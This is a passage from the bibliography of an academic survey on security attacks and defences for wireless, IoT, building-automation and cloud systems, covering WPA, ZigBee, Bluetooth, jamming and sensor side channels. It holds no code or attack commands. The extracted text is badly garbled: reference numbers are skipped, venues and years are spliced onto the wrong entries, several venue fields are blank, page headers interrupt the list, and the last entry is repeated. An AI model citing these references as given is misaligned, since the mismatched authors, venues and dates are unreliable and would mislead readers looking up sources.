Proceedings of the 10th international conference on Mobile systems,applications, and services , pages 323–336, 2012.[137] Trang Nguyen. Using unrestricted mobile sensors to infer tappedand traced user inputs. In , pages 151–156. IEEE,2015.[138] Duncan Hodges and Oliver Buckley. Reconstructing what you said:Text inference using smartphone motion.
IEEE Transactions on MobileComputing , 18(4):947–959, 2018.[139] Yi Liang, Zhipeng Cai, Jiguo Yu, Qilong Han, and Yingshu Li.Deep learning based inference of private information using embeddedsensors in smart devices.
IEEE Network , 32(4):8–14, 2018.[140] Nirupam Roy and Romit Roy Choudhury. Listening through avibration motor. In
Proceedings of the 14th Annual International Con-ference on Mobile Systems, Applications, and Services , MobiSys ’16,page 57–69, New York, NY, USA, 2016. Association for ComputingMachinery.[141] Martin Vuagnoux and Sylvain Pasini. Compromising electromagneticemanations of wired and wireless keyboards. In
USENIX securitysymposium , pages 1–16, 2009.[142] Jun Han, Albert Jin Chung, and Patrick Tague. Pitchln: Eavesdroppingvia intelligible speech reconstruction using non-acoustic sensor fusion.In
Proceedings of the 16th ACM/IEEE International Conference onInformation Processing in Sensor Networks , pages 296–310.IEEE, 2007.[147] Miron Abramovici and Paul Bradley. Integrated circuit security: newthreats and solutions. In
Proceedings of the 5th Annual Workshop onCyber Security and Information Intelligence Research: Cyber Securityand Information Intelligence Challenges and Strategies , pages 1–3,2009.[148] Rajat Subhra Chakraborty and Swarup Bhunia. Hardware protec-tion and authentication through netlist level obfuscation. In ,pages 674–677. IEEE, 2008.[149] Rajat Subhra Chakraborty and Swarup Bhunia. Harpoon: anobfuscation-based soc design methodology for hardware protection.
IEEE Transactions on Computer-Aided Design of Integrated Circuitsand Systems , 28(10):1493–1502, 2009. [150] Rajat Subhra Chakraborty and Swarup Bhunia. Security throughobscurity: An approach for protecting register transfer level hardwareip. In
Proceedings of the 31st Annual Computer Security ApplicationsConference , pages 181–190, 2015.[153] Andreas A Strikos. A full approach for intrusion detection inwireless sensor networks.
School of Information and CommunicationTechnology , 2007.[154] Krontiris Ioannis, Tassos Dimitriou, and Felix C Freiling. Towardsintrusion detection in wireless sensor networks. In
Proc. of the 13thEuropean Wireless Conference , pages 1–10. Citeseer, 2007.[155] Ashfaq Hussain Farooqi, Farrukh Aslam Khan, Jin Wang, and Sungy-oung Lee. A novel intrusion detection framework for wireless sensornetworks.
Personal and ubiquitous computing , 17(5):907–919, 2013.[156] Kanthakumar Pongaliur, Zubin Abraham, Alex X Liu, Li Xiao, andLeo Kempel. Securing sensor nodes against side channel attacks. In ,pages 353–361. IEEE, 2008.[157] Zhenwei Yu and Jeffrey JP Tsai. A framework of machine learningbased intrusion detection for wireless sensor networks. In , pages 272–279. IEEE, 2008.[158] Stephen Genusa. Crestron cresnet monitor. https://pushstack.wordpress.com/somfy-rts-protocol/, 2015. Online: Accessed 18-May-2020.[159] Caleb Mays, Mason Rice, Benjamin Ramsey, John Pecarina, andBarry Mullins. Defending building automation systems using decoynetworks. In
International Conference on Critical InfrastructureProtection , pages 297–317. Springer, 2017.[160] A. Volkova, M. Niedermeier, R. Basmadjian, and H. de Meer. Securitychallenges in control network protocols: A survey.
IEEE Communi-cations Surveys Tutorials , 21(1):619–639, 2019.[161] David G. Holmberg. Bacnet wide area network security threatassessment.
NIST, Department of Commerce , July 2003.[162] O. Gasser, Q. Scheitle, C. Denis, N. Schricker, and G. Carle. Securityimplications of publicly reachable building automation systems. In
Proceedings of the 7thannual international conference on Mobile computing and networking ,pages 180–189, 2001.[165] Arash Habibi Lashkari, Mir Mohammad Seyed Danesh, and BehrangSamadi. A survey on wireless security protocols (wep, wpa andwpa2/802.11 i). In
International Conference on Security in Computer Networks andDistributed Systems , pages 496–511. Springer, 2014.
FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac [169] Mathy Vanhoef and Frank Piessens. Key reinstallation attacks: Forcingnonce reuse in wpa2. In
Proceedings of the 2017 ACM SIGSACConference on Computer and Communications Security , pages 1313–1328, 2017.[170] Kody. Hack WPA & WPA2 Wi-Fi Passwords with a Pixie-Dust AttackUsing Airgeddon. https://null-byte.wonderhowto.com/how-to/hack-wpa-wpa2-wi-fi-passwords-with-pixie-dust-attack-using-airgeddon-0183556/, 2018. Online: Accessed 10-November-2020.[171] Mathy Vanhoef and Eyal Ronen. Dragonblood: Analyzing the drag-onfly handshake of wpa3 and eap-pwd. In
Proceedings of the 2020IEEE Symposium on Security and Privacy-S&P 2020) . IEEE, 2020.[172] Christopher P Kohlios and Thaier Hayajneh. A comprehensive attackflow model and security analysis for wi-fi and wpa3.
Electronics ,7(11):284, 2018.[173] Karim Lounis and Mohammad Zulkernine. Bad-token: denial ofservice attacks on wpa3. In
Proceedings of the 12th InternationalConference on Security of Information and Networks , pages 1–8, 2019.[174] Karim Lounis and Mohammad Zulkernine. Wpa3 connection depri-vation attacks. In
International Conference on Risks and Security ofInternet and Systems , pages 164–176. Springer, 2019.[175] Ying Wang, Zhigang Jin, and Ximan Zhao. Practical defense againstwep and wpa-psk attack for wlan. In , pages 1–4. IEEE, 2010.[176] Karim Lounis and Mohammad Zulkernine. Attacks and defenses inshort-range wireless technologies for iot.
IEEE Access , 8:88892–88932, 2020.[177] Lindsey N Whitehurst, Todd R Andel, and J Todd McDonald. Ex-ploring security in zigbee networks. In
Proceedings of the 9th AnnualCyber and Information Security Research Conference , pages 25–28,2014.[178] Chafika Benzaid, Karim Lounis, Ameer Al-Nemrat, Nadjib Badache,and Mamoun Alazab. Fast authentication in wireless sensor networks.
Future Generation Computer Systems , 55:362–375, 2016.[179] M. Knight. Wireless security - how safe is z-wave?
Computing ControlEngineering Journal , 17(6):18–23, Dec 2006.[180] R. Krejˇcí, O. Hujˇnák, and M. Švepeš. Security survey of the iot wire-less protocols. In ,pages 1–4, Nov 2017.[181] Jianfeng Wang. Zigbee light link and its applicationss.
IEEE WirelessCommunications , 20(4):6–7, 2013.[182] Tobias Zillner and Sebastian Strobl. Zigbee exploited: The good,the bad and the ugly. , 2015.[183] X. Cao, D. M. Shila, Y. Cheng, Z. Yang, Y. Zhou, and J. Chen. Ghost-in-zigbee: Energy depletion attack on zigbee-based wireless networks.
IEEE Internet of Things Journal , 3(5):816–829, Oct 2016.[184] E. Ronen, A. Shamir, A. O. Weingarten, and C. O’Flynn. Iot goesnuclear: Creating a zigbee chain reaction.
IEEE Security Privacy ,16(1):54–62, January 2018.[185] O. Olawumi, K. Haataja, M. Asikainen, N. Vidgren, and P. Toivanen.Three practical attacks against zigbee security: Attack scenario defi-nitions, practical experiments, countermeasures, and lessons learned.In ,pages 199–206, Dec 2014.[186] RiverLoopSec. Framework and Tools for Attacking ZigBee and IEEE802.15.4 networks. https://github.com/riverloopsec/killerbee, 2017.[187] Behrang Fouladi and Sahand Ghanoun. Security evaluation of thez-wave wireless protocol.
Black Hat USA , 24:1–2, 2013.[188] J. D. Fuller and B. W. Ramsey. Rogue z-wave controllers: A per-sistent attack channel. In , pages 99–106. IEEE, 2019.[191] Yaniv Shaked and Avishai Wool. Cracking the bluetooth pin. In
Proceedings of the 3rd international conference on Mobile systems,applications, and services , pages 39–50, 2005.[192] Seyed Mahdi Darroudi and Carles Gomez. Bluetooth low energy meshnetworks: A survey.
Sensors , 17(7):1467, 2017.[193] Nateq Be-Nazir Ibn Minar and Mohammed Tarique. Bluetooth securitythreats and solutions: a survey.
International Journal of Distributedand Parallel Systems , 3(1):127, 2012.[194] John Dunning. Taming the blue beast: A survey of bluetooth basedthreats.
IEEE Security & Privacy , 8(2):20–27, 2010.[195] Konstantin Hypponen and Keijo MJ Haataja. “nino” man-in-the-middle attack on bluetooth secure simple pairing. In , pages1–5. IEEE, 2007.[196] Da-Zhi Sun, Yi Mu, and Willy Susilo. Man-in-the-middle attacks onsecure simple pairing in bluetooth standard v5. 0 and its countermea-sure.
Personal and Ubiquitous Computing , 22(1):55–67, 2018.[197] Keijo Haataja and Pekka Toivanen. Two practical man-in-the-middleattacks on bluetooth secure simple pairing and countermeasures.
IEEETransactions on Wireless Communications , 9(1):384–392, 2010.[198] Keijo Haataja and Pekka Toivanen. Practical man-in-the-middle attacksagainst bluetooth secure simple pairing. In , pages 1–5. IEEE, 2008.[199] Keijo MJ Haataja and Konstantin Hypponen. Man-in-the-middleattacks on bluetooth: a comparative analysis, a novel attack, andcountermeasures. In , pages 1096–1102. IEEE,2008.[200] Johannes Barnickel, Jian Wang, and Ulrike Meyer. Implementing anattack on bluetooth 2.1+ secure simple pairing in passkey entry mode.In
WOOT , 7:1–10, 2007.[203] Karim Lounis and Mohammad Zulkernine. Connection dumpingvulnerability affecting bluetooth availability. In
International Confer-ence on Risks and Security of Internet and Systems , pages 188–204.Springer, 2018.[204] Asma Alsaidi and Firdous Kausar. Security attacks and countermea-sures on cloud assisted iot applications. In
Wireless VITAE 2013 , pages 1–5, 2013.[208] S. M. MirhoseiniNejad, A. Rahmanpour, and S. M. Razavizadeh.Phase jamming attack: A practical attack on physical layer-basedkey derivation. In , pages 1–4, 2018.
FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac [209] A. Mpitziopoulos, D. Gavalas, C. Konstantopoulos, and G. Pantziou.A survey on jamming attacks and countermeasures in wsns.
IEEECommunications Surveys Tutorials , 11(4):42–56, 2009.[210] Kanika Grover, Alvin Lim, and Qing Yang. Jamming and anti–jamming techniques in wireless networks: a survey.
InternationalJournal of Ad Hoc and Ubiquitous Computing , 17(4):197–215, 2014.[211] Matthias Wilhelm, Ivan Martinovic, Jens B. Schmitt, and VincentLenders. Short paper: Reactive jamming in wireless networks: Howrealistic is the threat? In
Proceedings of the Fourth ACM Conferenceon Wireless Network Security
IEEE INFOCOM 2007-26th IEEE International Conferenceon Computer Communications , pages 1307–1315. IEEE, 2007.[214] S. D. Babar, N. R. Prasad, and R. Prasad. Jamming attack: Behavioralmodelling and analysis. In
Wireless VITAE 2013 , pages 1–5, 2013.[215] V. C. Manju and K. M. Sasi. Detection of jamming style dos attack inwireless sensor network. In , pages 563–567, 2012.[216] Opeyemi Osanaiye, Attahiru S Alfa, and Gerhard P Hancke. Astatistical approach to detect jamming attacks in wireless sensornetworks.
Sensors , 18(6):1691, 2018.[217] Luis Puche Rondon, Leonardo Babun, Kemal Akkaya, and A. SelcukUluagac. Hdmi-walk: Attacking hdmi distribution networks via con-sumer electronic control protocol. In
IEEETransactions on Network Science and Engineering
IP Network Design Guide
Iraqi Journal for Computers and Informatics
NISTSpecial Publication
FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac
IEICE transactions on communications , pages 96–103, Dec 2016.[269] Zakir Durumeric, Eric Wustrow, and J. Alex Halderman. Zmap: Fastinternet-wide scanning and its security applications. In
Proceedings ofthe 22Nd USENIX Conference on Security , SEC’13, pages 605–620,Berkeley, CA, USA, 2013. USENIX Association.[270] Remote Central. Index of Remote Control File Areas.http://files.remotecentral.com/index.html, 2020. Online: Accessed25-September-2020.[271] J. Dudak, G. Gaspar, S. Sedivy, P. Fabo, L. Pepucha, and P. Tanuska.Serial communication protocol with enhanced properties–securingcommunication layer for smart sensors applications.
IEEE SensorsJournal , 19(1):378–390, 2019.[272] Paul Lawrence Wilson. ModSec: A Secure Modbus Protocol. Master’sthesis, Georgia Institute of Technology, 2018. [273] Ieee standard for secure scada communications protocol (sscp).
IEEEStd 1711.2-2019 ,pages 60–69. IEEE, 2007.[278] Anthony D Wood, John A Stankovic, and Sang Hyuk Son. Jam: Ajammed-area mapping service for sensor networks. In
RTSS 2003. 24thIEEE Real-Time Systems Symposium, 2003
FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac
Linux J.
Future Internet , 11(6):127,2019.[310] Yuhong Liu, Yan Lindsay Sun, Jungwoo Ryoo, Syed Rizvi, andAthanasios V Vasilakos. A survey of security and privacy challengesin cloud computing: solutions and future directions.
Journal ofComputing Science and Engineering , 9(3):119–133, 2015.[311] Mark D Ryan. Cloud computing security: The scientific challenge, anda survey of solutions.
Journal of Systems and Software , 86(9):2263–2268, 2013.[312] Farrukh Shahzad. State-of-the-art survey on cloud computing securitychallenges, approaches and solutions.
Procedia Computer Science ,37:357–362, 2014.[313] Subashini Subashini and Veeraruna Kavitha. A survey on security issues in service delivery models of cloud computing.
Journal ofnetwork and computer applications , 34(1):1–11, 2011.[314] Bernd Grobauer, Tobias Walloschek, and Elmar Stocker. Under-standing cloud computing vulnerabilities.
IEEE Security & privacy ,9(2):50–57, 2010.[315] Chirag Modi, Dhiren Patel, Bhavesh Borisaniya, Avi Patel, and Mut-tukrishnan Rajarajan. A survey on security issues and solutions atdifferent layers of cloud computing.
The journal of supercomputing ,63(2):561–592, 2013.[316] Saurabh Singh, Young-Sik Jeong, and Jong Hyuk Park. A survey oncloud computing security: Issues, threats, and solutions.
Journal ofNetwork and Computer Applications , 75:200–222, 2016.[317] Diogo AB Fernandes, Liliana FB Soares, João V Gomes, Mário MFreire, and Pedro RM Inácio. Security issues in cloud environments:a survey.
International Journal of Information Security , 13(2):113–170, 2014.[318] Fahad Polash, Abdullah Abuhussein, and Sajjan Shiva. A surveyof cloud computing taxonomies: Rationale and overview. In
The9th International Conference for Internet Technology and SecuredTransactions (ICITST-2014) , pages 459–465. IEEE, 2014.[319] Ashish Singh and Kakali Chatterjee. Cloud security issues andchallenges: A survey.
Journal of Network and Computer Applications ,79:88–115, 2017.[320] Zhifeng Xiao and Yang Xiao. Security and privacy in cloud computing.
IEEE communications surveys & tutorials , 15(2):843–859, 2012.[321] Claudio A Ardagna, Rasool Asal, Ernesto Damiani, and Quang HieuVu. From security to assurance in the cloud: A survey.
ACMComputing Surveys (CSUR) , 48(1):1–50, 2015.[322] Keiko Hashizume, David G Rosado, Eduardo Fernández-Medina, andEduardo B Fernandez. An analysis of security issues for cloudcomputing.
Journal of internet services and applications , 4(1):5, 2013.[323] Rakesh Kumar and Rinkaj Goyal. On cloud security requirements,threats, vulnerabilities and countermeasures: A survey.
ComputerScience Review
The Third International Conference on e-Technologies and Networks for Development (ICeND2014) , pages 79–82, 2014.[326] M. Babiker, O. O. Khalifa, K. K. Htike, A. Hassan, and M. Za-haradeen. Automated daily human activity recognition for videosurveillance using neural network. In
ACM Computing Surveys (CSUR) , 51(4):1–35, 2018.[330] Oxford Analytica. Fallout of solarwinds hack could last for years.
Emerald Expert Briefings , (oxan-es).[331] Threat Intelligence Team. SolarWinds advanced cyberattack: Whathappened and what to do now. https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public-sector-via-supply-chain-software-update/, 2020. Online: Accessed10-January-2021.[332] Samuel Litchfield, David Formby, Jonathan Rogers, Sakis Meliopou-
FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac los, and Raheem Beyah. Rethinking the honeypot for cyber-physicalsystems.
IEEE Internet Computing
Journal ofInformation Security and Applications , 38:8–27, 2018.[336] Jie Lin, Wei Yu, Nan Zhang, Xinyu Yang, Hanlin Zhang, and WeiZhao. A survey on internet of things: Architecture, enabling technolo-gies, security and privacy, and applications.
IEEE Internet of ThingsJournal , 4(5):1125–1142, 2017.[337] Fadele Ayotunde Alaba, Mazliza Othman, Ibrahim Abaker TargioHashem, and Faiz Alotaibi. Internet of things security: A survey.
Journal of Network and Computer Applications , 88:10–28, 2017.[338] Wan Haslina Hassan et al. Current research on internet of things (iot)security: A survey.
Computer networks , 148:283–294, 2019.[339] Vikas Hassija, Vinay Chamola, Vikas Saxena, Divyansh Jain, PranavGoyal, and Biplab Sikdar. A survey on iot security: application areas,security threats, and solution architectures.
IEEE Access , 7:82721–82743, 2019.[340] Alma Oracevic, Selma Dilek, and Suat Ozdemir. Security in internetof things: A survey. In , pages 1–6. IEEE, 2017.[341] Jyoti Deogirikar and Amarsinh Vidhate. Security attacks in iot: Asurvey. In , pages 32–37. IEEE, 2017.[342] Ashvini Balte, Asmita Kashid, and Balaji Patil. Security issues ininternet of things (iot): A survey.
International Journal of AdvancedResearch in Computer Science and Software Engineering , 5(4), 2015.[343] Kai Zhao and Lina Ge. A survey on the internet of things security.In , pages 663–667. IEEE, 2013.[344] Surapon Kraijak and Panwit Tuwanut. A survey on iot architectures,protocols, applications, security, privacy, real-world implementationand future trends. 2015.[345] Yuchen Yang, Longfei Wu, Guisheng Yin, Lijie Li, and Hongbin Zhao.A survey on security and privacy issues in internet-of-things.
IEEEInternet of Things Journal , 4(5):1250–1258, 2017.[346] Ankush B Pawar and Shashikant Ghumbre. A survey on iot applica-tions, security challenges and counter measures. In ,pages 294–299. IEEE, 2016.,pages 294–299. IEEE, 2016.